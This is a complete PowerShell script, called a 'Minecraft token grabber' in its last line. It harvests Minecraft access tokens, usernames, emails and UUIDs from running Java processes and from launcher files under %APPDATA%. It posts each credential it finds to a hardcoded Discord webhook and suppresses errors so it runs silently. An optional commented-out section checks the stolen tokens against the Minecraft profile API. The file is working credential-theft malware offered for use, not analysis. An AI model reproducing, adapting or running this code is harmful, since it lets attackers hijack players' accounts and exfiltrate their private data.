$webhookUrl = "https://discord.com/api/webhooks/1508519789566496950/B3L__pijUlyH20EfneD3XeA2CwwzCw0HteEze4taaUyxD1txNgPF2BwVXgeJzG-3Ifme"

# Disable progress bar for faster execution
$ProgressPreference = 'SilentlyContinue'

# === SECTION 1: RUNNING JAVA PROCESSES ===
Get-CimInstance -Query "SELECT CommandLine FROM Win32_Process WHERE Name LIKE 'Java%' AND CommandLine LIKE '%accessToken%'" |
    Select-Object -ExpandProperty CommandLine |
    ForEach-Object {
        $accessToken = $null
        $username = $null
        $uuid = $null
        $userType = $null
        $version = $null
        $gameDir = $null
        $ip = $null

        if ($_ -match '--accessToken\s+(\S+)') { $accessToken = $matches[1] }
        if ($_ -match '--username\s+(\S+)') { $username = $matches[1] }
        if ($_ -match '--uuid\s+(\S+)') { $uuid = $matches[1] }
        if ($_ -match '--userType\s+(\S+)') { $userType = $matches[1] }
        if ($_ -match '--version\s+(\S+)') { $version = $matches[1] }
        if ($_ -match '--gameDir\s+(\S+)') { $gameDir = $matches[1] }

        if ($accessToken -and $username) {
            $message = @"
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**MINECRAFT ACCESS TOKEN (JAVA PROCESS)**
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**Username:** $username
**Access Token:** `$accessToken
**UUID:** $uuid
**User Type:** $userType
**Version:** $version
**Game Directory:** $gameDir
**Time:** $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
"@
            $payload = @{content = $message} | ConvertTo-Json -Depth 10
            try {
                Invoke-RestMethod -Uri $webhookUrl -Method Post -ContentType "application/json" -Body $payload -ErrorAction SilentlyContinue
            } catch { }
        }
    }

# === SECTION 2: ACCOUNTS.JSON ===
$accountsPath = "$env:APPDATA\.minecraft\accounts.json"
if (Test-Path $accountsPath) {
    try {
        $accounts = Get-Content $accountsPath -Raw -ErrorAction SilentlyContinue | ConvertFrom-Json
        if ($accounts.accounts) {
            foreach ($acc in $accounts.accounts.PSObject.Properties) {
                $profile = $acc.Value
                $accessToken = $profile.accessToken
                $username = $profile.username
                $minecraftUsername = $profile.minecraftProfile.name
                $minecraftUUID = $profile.minecraftProfile.id
                
                if ($accessToken) {
                    $message = @"
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**MINECRAFT ACCESS TOKEN (ACCOUNTS.JSON)**
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**Access Token:** `$accessToken
**Account Email/Username:** $username
**Minecraft Username:** $minecraftUsername
**Minecraft UUID:** $minecraftUUID
**Time:** $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
"@
                    $payload = @{content = $message} | ConvertTo-Json
                    Invoke-RestMethod -Uri $webhookUrl -Method Post -ContentType "application/json" -Body $payload -ErrorAction SilentlyContinue
                }
            }
        }
    } catch { }
}

# === SECTION 3: LAUNCHER_PROFILES.JSON (legacy) ===
$profilesPath = "$env:APPDATA\.minecraft\launcher_profiles.json"
if (Test-Path $profilesPath) {
    try {
        $profiles = Get-Content $profilesPath -Raw -ErrorAction SilentlyContinue | ConvertFrom-Json
        if ($profiles.authenticationDatabase) {
            foreach ($auth in $profiles.authenticationDatabase.PSObject.Properties) {
                $accessToken = $auth.Value.accessToken
                $username = $auth.Value.username
                $displayName = $auth.Value.displayName
                $uuid = $auth.Value.uuid
                
                if ($accessToken -and $username) {
                    $message = @"
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**MINECRAFT ACCESS TOKEN (LAUNCHER_PROFILES.JSON)**
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**Access Token:** `$accessToken
**Username:** $displayName
**Email/Account:** $username
**UUID:** $uuid
**Time:** $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
"@
                    $payload = @{content = $message} | ConvertTo-Json
                    Invoke-RestMethod -Uri $webhookUrl -Method Post -ContentType "application/json" -Body $payload -ErrorAction SilentlyContinue
                }
            }
        }
    } catch { }
}

# === SECTION 4: LAUNCHER_LOG.TXT ===
$logPath = "$env:APPDATA\.minecraft\launcher_log.txt"
if (Test-Path $logPath) {
    try {
        $log = Get-Content $logPath -Raw -ErrorAction SilentlyContinue
        if ($log -match 'accessToken":"([^"]+)"') {
            $msToken = $matches[1]
            $message = @"
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**MINECRAFT TOKEN (LAUNCHER_LOG.TXT)**
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
**Token:** $msToken
**Source:** launcher_log.txt
**Time:** $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')
**━━━━━━━━━━━━━━━━━━━━━━━━━━━━**
"@
            $payload = @{content = $message} | ConvertTo-Json
            Invoke-RestMethod -Uri $webhookUrl -Method Post -ContentType "application/json" -Body $payload -ErrorAction SilentlyContinue
        }
    } catch { }
}

# === SECTION 5: VALIDATE TOKENS (optional - tests if token works) ===
# This uses the Mojang API to check token validity
# Uncomment to enable
<#
$apiUrl = "https://api.minecraftservices.com/minecraft/profile"
$headers = @{Authorization = "Bearer $accessToken"}
try {
    $profile = Invoke-RestMethod -Uri $apiUrl -Headers $headers -ErrorAction SilentlyContinue
    if ($profile) {
        $validMsg = @{content = "**Token Valid:** $($profile.name) ($($profile.id))"} | ConvertTo-Json
        Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $validMsg -ContentType "application/json"
    }
} catch { }
#>

Write-Host "Minecraft token grabber completed."
